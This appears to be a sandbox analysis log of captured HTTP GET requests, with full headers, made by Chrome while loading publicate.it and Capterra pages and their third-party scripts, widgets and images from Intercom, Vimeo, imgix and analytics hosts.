Source: global traffic HTTP traffic detected: GET /widget/cirlxq0d HTTP/1.1Host: widget.intercom.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /images/template5-p-500.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703; _clsk=1s3cw30%7C1725034585943%7C1%7C1%7Ct.clarity.ms%2Fcollect
Source: global traffic HTTP traffic detected: GET /images/favicon.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703; _clsk=1s3cw30%7C1725034585943%7C1%7C1%7Ct.clarity.ms%2Fcollect
Source: global traffic HTTP traffic detected: GET /frame.198be77c.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /vendor.e6414237.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /widget/cirlxq0d HTTP/1.1Host: widget.intercom.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /events/1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=55786&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP/1.1Host: bam-cell.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=4a13c21de71e3a5f
Source: global traffic HTTP traffic detected: GET /vendor.e6414237.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /frame.198be77c.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /pubsub/5-2VrTcJ-wReFxxSsvN27p3l1l-rfQjhxEa0K_rcpidI_YYfbgqGBaXudDoBZfnBOD-yT-ZZ7mQ1OR91C6MrHx-21kDMXCDQnf8S3-?X-Nexus-New-Client=true&X-Nexus-Version=0.14.0&user_role=visitor HTTP/1.1Host: nexus-websocket-a.intercom.ioConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://publicate.itSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: Q0aP9KozPyLlmSCTR7OBOw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global traffic HTTP traffic detected: GET /messenger/web/ping HTTP/1.1Host: api-iam.intercom.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /messenger/web/ping HTTP/1.1Host: api-iam.intercom.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: seoab.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /las-form-min.js HTTP/1.1Host: lead-acquisition-service.softwareadvice.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /video/588275950-244fb2cb9bf09fea29744f33a17f6ccc6b086555648aa37316f32f0d6be2da70-d_640 HTTP/1.1Host: i.vimeocdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /las-form-min.js HTTP/1.1Host: lead-acquisition-service.softwareadvice.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: seoab.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /video/588275950-244fb2cb9bf09fea29744f33a17f6ccc6b086555648aa37316f32f0d6be2da70-d_640 HTTP/1.1Host: i.vimeocdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/dd1b7965-612d-4c53-899b-0cf4a9337971.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/415abb34-71b7-4fa2-8dc4-1211cac6e655.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductScreenshot/d6478d12-ac95-43f1-a53a-aa8be1781a2f.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/a67f601c-1c43-4480-8665-f74fae6e4252.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/229dd3ed-048e-42a1-96c3-68cd64c6a705.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductScreenshot/13f1c805-bb5f-4777-ae73-15df50ea1d02.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/b2520648-b79c-4e03-98c1-8ad16b374420.png?auto=format%2Ccompress&fit=max&w=96&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/e4a33fab-dc7a-4869-b53e-a3876430e9cb.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/91f64896-759a-41ae-8d14-d540f90c5870.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/dd1b7965-612d-4c53-899b-0cf4a9337971.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/415abb34-71b7-4fa2-8dc4-1211cac6e655.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/af2cdc9a-967d-4921-a711-ec9e1a75cf88.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/a67f601c-1c43-4480-8665-f74fae6e4252.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/5152f7c6-61ed-4168-b89f-f436d97ebccd.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/229dd3ed-048e-42a1-96c3-68cd64c6a705.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductScreenshot/13f1c805-bb5f-4777-ae73-15df50ea1d02.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/d5bb525e-43fd-44ad-b018-e69dbd4d4817.jpeg?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductScreenshot/d6478d12-ac95-43f1-a53a-aa8be1781a2f.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/0d820dd6-6e0b-43de-becb-e9078a2d9fac.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/1a2b2816-ff47-405e-a9e2-2b8d6fd68dfd.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/b2520648-b79c-4e03-98c1-8ad16b374420.png?auto=format%2Ccompress&fit=max&w=96&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/91f64896-759a-41ae-8d14-d540f90c5870.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/e4a33fab-dc7a-4869-b53e-a3876430e9cb.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/af2cdc9a-967d-4921-a711-ec9e1a75cf88.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/d5bb525e-43fd-44ad-b018-e69dbd4d4817.jpeg?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
